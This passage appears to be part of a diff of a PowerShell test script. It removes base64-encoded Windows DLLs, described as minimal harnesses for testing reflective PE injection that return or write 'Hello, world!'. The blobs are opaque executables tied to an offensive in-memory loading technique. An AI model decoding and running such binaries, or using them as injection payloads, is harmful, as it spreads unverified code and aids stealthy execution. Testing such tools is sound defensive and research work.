AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASABlAGwAbABvACwAIAB3AG8AcgBsAGQAIQAAAAAgABAAAAAA7/A8VgAAAABSIAAAAQAAAAEAAAABAAAASCAAAEwgAABQIAAAEBAAAHQgAAAAAFJlZmxlY3RpdmVQRUluamVjdFRlc3RIYXJuZXNzLmRsbABXU3RyaW5nRnVuYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-
-	# A bare bones test harness DLL that simply returns "Hello, world!" upon having StringFunc called
-	$Encoded64BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-
-	# A bare bones test harness DLL that simply writes "Hello, world!" to %TEMP%\testoutput.txt upon having VoidFunc called
-	$Encoded64BitVoidDll = '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'
-	$Encoded32BitVoidDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABxqgfBNctpkjXLaZI1y2mSPLP6kjbLaZI1y2iSM8tpkheyjZI0y2mSF7K1kjTLaZIXsreSNMtpklJpY2g1y2mSAAAAAAAAAABQRQAATAEDAO58PlYAAAAAAAAAAOAAAiELAQwAAAIAAAAEAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABQABAAAAAAAFAAEAAAAAAABAAAAABAAA4GcAAAEAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAABgIAAAXQAAAMAgAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA5gAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAHwBAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAoAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAAAwgwAzMzMzMzMzMxVi+yB7BwBAAChHCAAEPMPfgUkIAAQiUX4D7cFICAAEGaJRfygIiAAEFaIRf6hLCAAEIlF8A+3BTAgABBoNCAAEGhAIAAQZg/WRehmiUX0/xUMIAAQUP8VCCAAEIvwhfZ0b2gCAQAAjYXk/v//UI1F+FD/FQAgABCFwHRVaEggABCNheT+//9oAgEAAFD/1oPEDIXAdTtQaIAAAABqAlBqB2gAAABAjYXk/v//UP8VFCAAEIvwhfZ0GGoAagBqDo1F6FBW/xUEIAAQVv8VECAAEF6L5V3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiEAAC4hAAA6IQAATCEAAGAhAAAEIQAAAAAAACVURU1QJQAASGVsbG8sIHdvcmxkIQAAAHN0cmNhdF9zAAAAAG50ZGxsAAAAXHRlc3RvdXRwdXQudHh0AAAAAAAAAAAAAAAAAO58PlYAAAAAkiAAAAEAAAABAAAAAQAAAIggAACMIAAAkCAAABAQAAC0IAAAAABSZWZsZWN0aXZlUEVJbmplY3RUZXN0SGFybmVzcy5kbGwAVm9pZEZ1bmMAAAAA6CAAAAAAAAAAAAAAbiEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIhAAAuIQAAOiEAAEwhAABgIQAABCEAAAAAAACIAENyZWF0ZUZpbGVBABwBRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzQQAlBVdyaXRlRmlsZQBFAkdldFByb2NBZGRyZXNzAAAVAkdldE1vZHVsZUhhbmRsZUEAAFIAQ2xvc2VIYW5kbGUAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAKAAAABowIjAsMDUwPjBIME0wUjBhMGgwhDCNML8w1jDdMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA